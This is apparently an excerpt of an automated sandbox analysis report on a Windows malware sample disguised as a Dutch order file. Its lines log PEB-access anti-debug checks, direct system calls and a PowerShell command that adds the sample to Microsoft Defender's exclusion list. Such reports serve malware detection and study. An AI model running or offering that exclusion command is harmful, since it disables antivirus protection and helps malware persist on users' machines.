                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0327A0E3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A50E4 mov eax, dword ptr fs:[00000030h]5_2_032A50E4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A50E4 mov ecx, dword ptr fs:[00000030h]5_2_032A50E4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327C0F0 mov eax, dword ptr fs:[00000030h]5_2_0327C0F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C20F0 mov ecx, dword ptr fs:[00000030h]5_2_032C20F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov ecx, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov ecx, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov ecx, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov ecx, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C0 mov eax, dword ptr fs:[00000030h]5_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033550D9 mov eax, dword ptr fs:[00000030h]5_2_033550D9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033020DE mov eax, dword ptr fs:[00000030h]5_2_033020DE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD0C0 mov eax, dword ptr fs:[00000030h]5_2_032FD0C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD0C0 mov eax, dword ptr fs:[00000030h]5_2_032FD0C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A90DB mov eax, dword ptr fs:[00000030h]5_2_032A90DB
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03283720 mov eax, dword ptr fs:[00000030h]5_2_03283720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335B73C mov eax, dword ptr fs:[00000030h]5_2_0335B73C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335B73C mov eax, dword ptr fs:[00000030h]5_2_0335B73C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335B73C mov eax, dword ptr fs:[00000030h]5_2_0335B73C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335B73C mov eax, dword ptr fs:[00000030h]5_2_0335B73C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329F720 mov eax, dword ptr fs:[00000030h]5_2_0329F720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329F720 mov eax, dword ptr fs:[00000030h]5_2_0329F720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329F720 mov eax, dword ptr fs:[00000030h]5_2_0329F720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BC720 mov eax, dword ptr fs:[00000030h]5_2_032BC720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BC720 mov eax, dword ptr fs:[00000030h]5_2_032BC720
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328973A mov eax, dword ptr fs:[00000030h]5_2_0328973A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328973A mov eax, dword ptr fs:[00000030h]5_2_0328973A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B273C mov eax, dword ptr fs:[00000030h]5_2_032B273C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B273C mov ecx, dword ptr fs:[00000030h]5_2_032B273C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B273C mov eax, dword ptr fs:[00000030h]5_2_032B273C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279730 mov eax, dword ptr fs:[00000030h]5_2_03279730
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279730 mov eax, dword ptr fs:[00000030h]5_2_03279730
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F72E mov eax, dword ptr fs:[00000030h]5_2_0333F72E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FC730 mov eax, dword ptr fs:[00000030h]5_2_032FC730
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334972B mov eax, dword ptr fs:[00000030h]5_2_0334972B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B5734 mov eax, dword ptr fs:[00000030h]5_2_032B5734
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03285702 mov eax, dword ptr fs:[00000030h]5_2_03285702
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03285702 mov eax, dword ptr fs:[00000030h]5_2_03285702
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287703 mov eax, dword ptr fs:[00000030h]5_2_03287703
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BC700 mov eax, dword ptr fs:[00000030h]5_2_032BC700
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BF71F mov eax, dword ptr fs:[00000030h]5_2_032BF71F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BF71F mov eax, dword ptr fs:[00000030h]5_2_032BF71F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03280710 mov eax, dword ptr fs:[00000030h]5_2_03280710
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B0710 mov eax, dword ptr fs:[00000030h]5_2_032B0710
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B765 mov eax, dword ptr fs:[00000030h]5_2_0327B765
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B765 mov eax, dword ptr fs:[00000030h]5_2_0327B765
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B765 mov eax, dword ptr fs:[00000030h]5_2_0327B765
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B765 mov eax, dword ptr fs:[00000030h]5_2_0327B765
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03288770 mov eax, dword ptr fs:[00000030h]5_2_03288770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290770 mov eax, dword ptr fs:[00000030h]5_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03304755 mov eax, dword ptr fs:[00000030h]5_2_03304755
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B674D mov esi, dword ptr fs:[00000030h]5_2_032B674D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B674D mov eax, dword ptr fs:[00000030h]5_2_032B674D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B674D mov eax, dword ptr fs:[00000030h]5_2_032B674D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03293740 mov eax, dword ptr fs:[00000030h]5_2_03293740
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03293740 mov eax, dword ptr fs:[00000030h]5_2_03293740
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03293740 mov eax, dword ptr fs:[00000030h]5_2_03293740
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03280750 mov eax, dword ptr fs:[00000030h]5_2_03280750
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2750 mov eax, dword ptr fs:[00000030h]5_2_032C2750
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2750 mov eax, dword ptr fs:[00000030h]5_2_032C2750
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03353749 mov eax, dword ptr fs:[00000030h]5_2_03353749
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033537B6 mov eax, dword ptr fs:[00000030h]5_2_033537B6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032807AF mov eax, dword ptr fs:[00000030h]5_2_032807AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033097A9 mov eax, dword ptr fs:[00000030h]5_2_033097A9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD7B0 mov eax, dword ptr fs:[00000030h]5_2_032AD7B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F7BA mov eax, dword ptr fs:[00000030h]5_2_0327F7BA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330F7AF mov eax, dword ptr fs:[00000030h]5_2_0330F7AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330F7AF mov eax, dword ptr fs:[00000030h]5_2_0330F7AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330F7AF mov eax, dword ptr fs:[00000030h]5_2_0330F7AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330F7AF mov eax, dword ptr fs:[00000030h]5_2_0330F7AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330F7AF mov eax, dword ptr fs:[00000030h]5_2_0330F7AF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F78A mov eax, dword ptr fs:[00000030h]5_2_0333F78A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A27ED mov eax, dword ptr fs:[00000030h]5_2_032A27ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A27ED mov eax, dword ptr fs:[00000030h]5_2_032A27ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A27ED mov eax, dword ptr fs:[00000030h]5_2_032A27ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0328D7E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032847FB mov eax, dword ptr fs:[00000030h]5_2_032847FB
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032847FB mov eax, dword ptr fs:[00000030h]5_2_032847FB
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328C7C0 mov eax, dword ptr fs:[00000030h]5_2_0328C7C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032857C0 mov eax, dword ptr fs:[00000030h]5_2_032857C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032857C0 mov eax, dword ptr fs:[00000030h]5_2_032857C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032857C0 mov eax, dword ptr fs:[00000030h]5_2_032857C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F626 mov eax, dword ptr fs:[00000030h]5_2_0327F626
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355636 mov eax, dword ptr fs:[00000030h]5_2_03355636
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328262C mov eax, dword ptr fs:[00000030h]5_2_0328262C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B6620 mov eax, dword ptr fs:[00000030h]5_2_032B6620
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B8620 mov eax, dword ptr fs:[00000030h]5_2_032B8620
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E627 mov eax, dword ptr fs:[00000030h]5_2_0329E627
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329260B mov eax, dword ptr fs:[00000030h]5_2_0329260B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE609 mov eax, dword ptr fs:[00000030h]5_2_032FE609
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BF603 mov eax, dword ptr fs:[00000030h]5_2_032BF603
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B1607 mov eax, dword ptr fs:[00000030h]5_2_032B1607
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2619 mov eax, dword ptr fs:[00000030h]5_2_032C2619
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03283616 mov eax, dword ptr fs:[00000030h]5_2_03283616
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03283616 mov eax, dword ptr fs:[00000030h]5_2_03283616
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA660 mov eax, dword ptr fs:[00000030h]5_2_032BA660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA660 mov eax, dword ptr fs:[00000030h]5_2_032BA660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B9660 mov eax, dword ptr fs:[00000030h]5_2_032B9660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B9660 mov eax, dword ptr fs:[00000030h]5_2_032B9660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334866E mov eax, dword ptr fs:[00000030h]5_2_0334866E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334866E mov eax, dword ptr fs:[00000030h]5_2_0334866E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B2674 mov eax, dword ptr fs:[00000030h]5_2_032B2674
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329C640 mov eax, dword ptr fs:[00000030h]5_2_0329C640
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D6AA mov eax, dword ptr fs:[00000030h]5_2_0327D6AA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D6AA mov eax, dword ptr fs:[00000030h]5_2_0327D6AA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BC6A6 mov eax, dword ptr fs:[00000030h]5_2_032BC6A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B66B0 mov eax, dword ptr fs:[00000030h]5_2_032B66B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284690 mov eax, dword ptr fs:[00000030h]5_2_03284690
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284690 mov eax, dword ptr fs:[00000030h]5_2_03284690
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033006F1 mov eax, dword ptr fs:[00000030h]5_2_033006F1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033006F1 mov eax, dword ptr fs:[00000030h]5_2_033006F1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333D6F0 mov eax, dword ptr fs:[00000030h]5_2_0333D6F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B36EF mov eax, dword ptr fs:[00000030h]5_2_032B36EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD6E0 mov eax, dword ptr fs:[00000030h]5_2_032AD6E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD6E0 mov eax, dword ptr fs:[00000030h]5_2_032AD6E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B16CF mov eax, dword ptr fs:[00000030h]5_2_032B16CF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA6C7 mov ebx, dword ptr fs:[00000030h]5_2_032BA6C7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -ForceJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
